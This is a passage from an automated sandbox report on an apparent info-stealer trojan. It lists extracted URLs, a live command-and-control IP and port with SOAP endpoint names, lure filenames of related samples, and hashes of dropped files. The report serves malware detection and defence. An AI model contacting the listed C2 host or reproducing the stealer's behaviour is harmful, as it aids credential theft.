                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://ipinfo.io/ip%appdata%DBAcglWJwi.exefalse
                                  		high
                                  https://duckduckgo.com/chrome_newtabDBAcglWJwi.exe, 00000000.00000002.567717089.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, tmp68C9.tmp.0.dr, tmp6316.tmp.0.dr, tmp65A9.tmp.0.dr, tmp621B.tmp.0.dr, tmp679F.tmp.0.dr, tmp6411.tmp.0.dr, tmp8BB2.tmp.0.dr, tmpA614.tmp.0.dr, tmp66D3.tmp.0.dr, tmp6AEE.tmp.0.dr, tmp6A32.tmp.0.dr, tmp64DD.tmp.0.drfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=DBAcglWJwi.exe, 00000000.00000002.567717089.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, tmp68C9.tmp.0.dr, tmp6316.tmp.0.dr, tmp65A9.tmp.0.dr, tmp621B.tmp.0.dr, tmp679F.tmp.0.dr, tmp6411.tmp.0.dr, tmp8BB2.tmp.0.dr, tmpA614.tmp.0.dr, tmp66D3.tmp.0.dr, tmp6AEE.tmp.0.dr, tmp6A32.tmp.0.dr, tmp64DD.tmp.0.drfalse
                                      		high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoDBAcglWJwi.exe, 00000000.00000002.567717089.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, tmp68C9.tmp.0.dr, tmp6316.tmp.0.dr, tmp65A9.tmp.0.dr, tmp621B.tmp.0.dr, tmp679F.tmp.0.dr, tmp6411.tmp.0.dr, tmp8BB2.tmp.0.dr, tmpA614.tmp.0.dr, tmp66D3.tmp.0.dr, tmp6AEE.tmp.0.dr, tmp6A32.tmp.0.dr, tmp64DD.tmp.0.drfalse
                                        		high
                                        http://ns.adobe.cobjDBAcglWJwi.exe, 00000000.00000003.562609335.0000000008591000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000003.562398322.0000000008590000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000003.562200339.0000000008590000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000003.526220731.0000000008581000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousDBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://tempuri.org/Endpoint/CheckConnectResponseDBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.datacontract.org/2004/07/DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/Endpoint/EnvironmentSettingsDBAcglWJwi.exe, 00000000.00000002.566530669.00000000026EF000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/t_DBAcglWJwi.exe, 00000000.00000002.566530669.00000000026EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://api.ip.sb/geoip%USERPEnvironmentROFILE%DBAcglWJwi.exefalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://api.ip.sb/geoipDBAcglWJwi.exe, 00000000.00000002.566530669.00000000026EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/soap/envelope/DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=DBAcglWJwi.exe, 00000000.00000002.567717089.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, tmp68C9.tmp.0.dr, tmp6316.tmp.0.dr, tmp65A9.tmp.0.dr, tmp621B.tmp.0.dr, tmp679F.tmp.0.dr, tmp6411.tmp.0.dr, tmp8BB2.tmp.0.dr, tmpA614.tmp.0.dr, tmp66D3.tmp.0.dr, tmp6AEE.tmp.0.dr, tmp6A32.tmp.0.dr, tmp64DD.tmp.0.drfalse
                                              		high
                                              http://schemas.xmlsoap.org/soap/envelope/DDBAcglWJwi.exe, 00000000.00000002.566530669.00000000026EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://tempuri.org/DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://tempuri.org/Endpoint/CheckConnectDBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchDBAcglWJwi.exe, 00000000.00000002.567717089.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, tmp68C9.tmp.0.dr, tmp6316.tmp.0.dr, tmp65A9.tmp.0.dr, tmp621B.tmp.0.dr, tmp679F.tmp.0.dr, tmp6411.tmp.0.dr, tmp8BB2.tmp.0.dr, tmpA614.tmp.0.dr, tmp66D3.tmp.0.dr, tmp6AEE.tmp.0.dr, tmp6A32.tmp.0.dr, tmp64DD.tmp.0.drfalse
                                                  		high
                                                  http://ns.adobe.c/gDBAcglWJwi.exe, 00000000.00000003.562609335.0000000008591000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000003.562398322.0000000008590000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000003.562200339.0000000008590000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000003.526220731.0000000008581000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://tempuri.org/Endpoint/VerifyUpdateResponseDBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://api.ip.sb4VlHDBAcglWJwi.exe, 00000000.00000002.566530669.00000000026EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://tempuri.org/Endpoint/SetEnvironmentDBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://tempuri.org/Endpoint/SetEnvironmentResponseDBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://tempuri.org/Endpoint/GetUpdatesDBAcglWJwi.exe, 00000000.00000002.567244798.0000000002866000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://ac.ecosia.org/autocomplete?q=DBAcglWJwi.exe, 00000000.00000002.567717089.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, tmp68C9.tmp.0.dr, tmp6316.tmp.0.dr, tmp65A9.tmp.0.dr, tmp621B.tmp.0.dr, tmp679F.tmp.0.dr, tmp6411.tmp.0.dr, tmp8BB2.tmp.0.dr, tmpA614.tmp.0.dr, tmp66D3.tmp.0.dr, tmp6AEE.tmp.0.dr, tmp6A32.tmp.0.dr, tmp64DD.tmp.0.drfalse
                                                    		high
                                                    https://api.ip.sb/geoip%USERPEnvironmentROFILEDBAcglWJwi.exefalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://api.ipify.orgcookies//settinString.RemovegDBAcglWJwi.exefalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2004/08/addressingDBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://185.222.58.90:17910DBAcglWJwi.exe, 00000000.00000002.567244798.0000000002866000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultDBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://api.ipify.orgcookies//settiDBAcglWJwi.exefalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://tempuri.org/Endpoint/GetUpdatesResponseDBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://tempuri.org/Endpoint/EnvironmentSettingsResponseDBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://tempuri.org/Endpoint/VerifyUpdateDBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://tempuri.org/0DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://tempuri.org/Endpoint/SetEnvironmenterDBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=DBAcglWJwi.exe, 00000000.00000002.567717089.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, tmp68C9.tmp.0.dr, tmp6316.tmp.0.dr, tmp65A9.tmp.0.dr, tmp621B.tmp.0.dr, tmp679F.tmp.0.dr, tmp6411.tmp.0.dr, tmp8BB2.tmp.0.dr, tmpA614.tmp.0.dr, tmp66D3.tmp.0.dr, tmp6AEE.tmp.0.dr, tmp6A32.tmp.0.dr, tmp64DD.tmp.0.drfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/soap/actor/nextDBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://ns.ado/1DBAcglWJwi.exe, 00000000.00000003.562609335.0000000008591000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000003.562398322.0000000008590000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000003.562200339.0000000008590000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000003.526220731.0000000008581000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=DBAcglWJwi.exe, 00000000.00000002.567717089.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, tmp68C9.tmp.0.dr, tmp6316.tmp.0.dr, tmp65A9.tmp.0.dr, tmp621B.tmp.0.dr, tmp679F.tmp.0.dr, tmp6411.tmp.0.dr, tmp8BB2.tmp.0.dr, tmpA614.tmp.0.dr, tmp66D3.tmp.0.dr, tmp6AEE.tmp.0.dr, tmp6A32.tmp.0.dr, tmp64DD.tmp.0.drfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                185.222.58.90
                                                                		unknownNetherlands
                                                                		51447ROOTLAYERNETNLfalse

                                                                General Information

                                                                Joe Sandbox Version:35.0.0 Citrine
                                                                Analysis ID:660832
                                                                Start date and time: 11/07/202210:29:302022-07-11 10:29:30 +02:00
                                                                Joe Sandbox Product:CloudBasic
                                                                Overall analysis duration:0h 8m 7s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Sample file name:DBAcglWJwi.exe
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                Number of analysed new started processes analysed:18
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • HDC enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@2/29@2/1
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HDC Information:Failed
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 13
                                                                • Number of non-executed functions: 2
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Adjust boot time
                                                                • Enable AMSI

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                • Excluded IPs from analysis (whitelisted): 104.26.13.31, 172.67.75.172, 104.26.12.31
                                                                • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, licensing.mp.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                10:31:22API Interceptor113x Sleep call for process: DBAcglWJwi.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                185.222.58.90QUOTATION062022.exeGet hashmaliciousBrowse
                                                                • 185.222.58.90:17910/
                                                                QUOTATION 061622.exeGet hashmaliciousBrowse
                                                                • 185.222.58.90:17910/
                                                                SecuriteInfo.com.Variant.MSILHeracles.37401.28222.exeGet hashmaliciousBrowse
                                                                • 185.222.58.90:17910/
                                                                RFQ - FYKS - 06052022.exeGet hashmaliciousBrowse
                                                                • 185.222.58.90:17910/
                                                                MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                • 185.222.58.90:17910/
                                                                MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                • 185.222.58.90:17910/

                                                                Domains

                                                                No context

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                ROOTLAYERNETNLASY098743680987654345.exeGet hashmaliciousBrowse
                                                                • 185.222.57.72
                                                                104ce6238e3110804de201906d968f3b95fd6e8bc6018.exeGet hashmaliciousBrowse
                                                                • 185.222.57.72
                                                                0987543234567800098765434.exeGet hashmaliciousBrowse
                                                                • 185.222.57.72
                                                                Shipping Info.pdf.jsGet hashmaliciousBrowse
                                                                • 45.137.22.163
                                                                SOA_EU DRAGON Debit & Credit Notes_Evaluation opy.exeGet hashmaliciousBrowse
                                                                • 45.137.22.143
                                                                RFQ-SPECS_Quote for New Shipment Inline.exeGet hashmaliciousBrowse
                                                                • 45.137.22.143
                                                                QUOTATION062722.exeGet hashmaliciousBrowse
                                                                • 185.222.58.90
                                                                QUOTE .jsGet hashmaliciousBrowse
                                                                • 45.137.22.137
                                                                RFQ#248.jsGet hashmaliciousBrowse
                                                                • 45.137.22.113
                                                                mjrtHW8CJA.exeGet hashmaliciousBrowse
                                                                • 45.137.22.137
                                                                screenshot 001.exeGet hashmaliciousBrowse
                                                                • 45.137.22.137
                                                                GTV3285776_06172022.exeGet hashmaliciousBrowse
                                                                • 185.222.57.197
                                                                QUOTATION062022.exeGet hashmaliciousBrowse
                                                                • 185.222.58.90
                                                                Sipari#U015f -16 0652022 _June 2022,pfd.exeGet hashmaliciousBrowse
                                                                • 185.222.57.197
                                                                SecuriteInfo.com.W32.AIDetect.malware2.21664.exeGet hashmaliciousBrowse
                                                                • 185.222.57.197
                                                                QUOTATION 061622.exeGet hashmaliciousBrowse
                                                                • 185.222.58.90
                                                                vbc.exeGet hashmaliciousBrowse
                                                                • 185.222.57.197
                                                                SOA.exeGet hashmaliciousBrowse
                                                                • 185.222.57.146
                                                                0123987INMWN2987.jsGet hashmaliciousBrowse
                                                                • 45.137.22.152
                                                                L4aghbwCQr54nW4.exeGet hashmaliciousBrowse
                                                                • 45.137.22.152

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DBAcglWJwi.exe.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):2502
                                                                Entropy (8bit):5.3347050065951125
                                                                Encrypted:false
                                                                SSDEEP:48:MOfHK5HKXAHKdHKBSTHaAHKzvRYHKhQnoPtHoxHImHKhBHKoHaHZHAHxLHG1qHjS:vq5qXAqdqslqzJYqhQnoPtIxHbqLqo6p
                                                                MD5:2BF079EA03BF5AB82640736A9F171908
                                                                SHA1:232A8C975E57B3124752F9A9A97D769E7EFF6027
                                                                SHA-256:FC5BCB6E64913F48A49217B6625EE6942D3C7C166AC7AB1F699662E782982F12
                                                                SHA-512:CF536D0F7BF5668E4CF2E03A08745E1EF3F6FC21573D2BE9B194F31BC64878FB60CA3DCDDD30D39D41A732FDB39CE0305EE9C3AAD33AC90712D6D9DBB3921B95
                                                                Malicious:true
                                                                Reputation:moderate, very likely benign file
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,

                                                                C:\Users\user\AppData\Local\Temp\tmp23A9.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1026
                                                                Entropy (8bit):4.6868290294905215
                                                                Encrypted:false
                                                                SSDEEP:24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
                                                                MD5:E655D05DEDA782A6FE1E44028236D3A4
                                                                SHA1:ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
                                                                SHA-256:69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
                                                                SHA-512:25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

                                                                C:\Users\user\AppData\Local\Temp\tmp4932.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1026
                                                                Entropy (8bit):4.704010251295094
                                                                Encrypted:false
                                                                SSDEEP:24:/j/sfpWFBIirMexXYVw/K9dKAkzFeHx1x21g4kug4c7xy:/j/vBDZxXYVw/KXjHx/4kuUxy
                                                                MD5:DF05C5F93419C56BFE3A84BDCC929382
                                                                SHA1:36AABBCD46C0F368E18FA602E486816D2578F48E
                                                                SHA-256:F7116531006BD0A5DEE64436C66CE5487C662F72BFBCD235C7407FBF2A3278DE
                                                                SHA-512:EB50E34AA5EE92A7C90AA5BCE11F0693AFAC73C26B04AF9C676E15A24813C52EAF09A4EA3F6490223CABCDB3EB6277E74CB6FF288D3D1871F14B410E950656BA
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:MNULNCRIYCLQPFRTTBIRJXLLXDPOIGHIWSMRZAWOWMFPIGBQDOQPBHCVDNAEFVPPKLZOIKPKFYDTDOGMSIUWATNOJJJSNKBWJHKKWMUZDRGJJNWUASOTXKYYIZLCOHDOBJPMAPIXVROTWYIYRPFZWZLECCXJOFYKKMMQGDBCRRZBEIALJQWFBIRGZWKKZNILSZURIFNVYXWPHRMYGXATLINJURPYVWCXYNUAESGKBUAMJTBBSVQQAIZKUVJSGVILJMHXCRFQYYXESEYBSMBQEHOEREHZFHPFENYHMHULCMQJKSSZLDDCMPWESAOKZQCENLMVXZGUVHNVUKXEWENTAXUEHCWCADQIRNYDFQPSQSUSDTQUVKPDYTOYMXIFXIMYDOEFHNJDKHPJDUFNMBXUSNDPQKBSTIVTXYHJYKOGCJMZHQRQQDXTWGEMBAJZIDXHPCGJTNITUFATHMPLPFJLWOPXNLVVCCPOQFCWKUCSSMFUWUXSMBYFBMUPJSINHRBJCPPQTSNUWCSGVBNMGEVXSQAUHMBGCNHVBRKKXPGDWRHAWFZYIGXLNCPKSLAZERFWOQNQAXTGZOWNEPLIJOXTLEMUDNYMQCRGFNMOCSUXSKKUKSNFLMUYAVMFWVWOEHAYJWOLYNYYTGSCYSYAJVUNEZQYLOBOCROMKWXPJGQVMSTNKYJEQCUQCBVMAJBOALKJAPYUEVMIWWFMSPLPSKKZMKNEKPQGDNBVBYHNPDIQEEKXUZLGWXQGDQZEHBMYYFUDFGNLYGARBRCREXIQUUWFEXDYINDKFJACYETJBANLSCEYWEBIPFZEOGUWOHBPBFLDAELAEPFOIZRSYWISCBUYPUAHWUVAIRDXHGXUQNAEDFFRDSODQFGQLGCIHSIWHVUDCTSMIQTMXSFNUPKSLBDPGVPMZPHIEMSXUQSRIGGMHVDMGMPEPCJPZBENUEBMZNZVWTRCVAGRSYRBZLOAETCXTWCINHSWQQFCHATVQRGJ

                                                                C:\Users\user\AppData\Local\Temp\tmp58BF.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):40960
                                                                Entropy (8bit):0.792852251086831
                                                                Encrypted:false
                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmp5A46.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):40960
                                                                Entropy (8bit):0.792852251086831
                                                                Encrypted:false
                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmp5C7A.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):40960
                                                                Entropy (8bit):0.792852251086831
                                                                Encrypted:false
                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
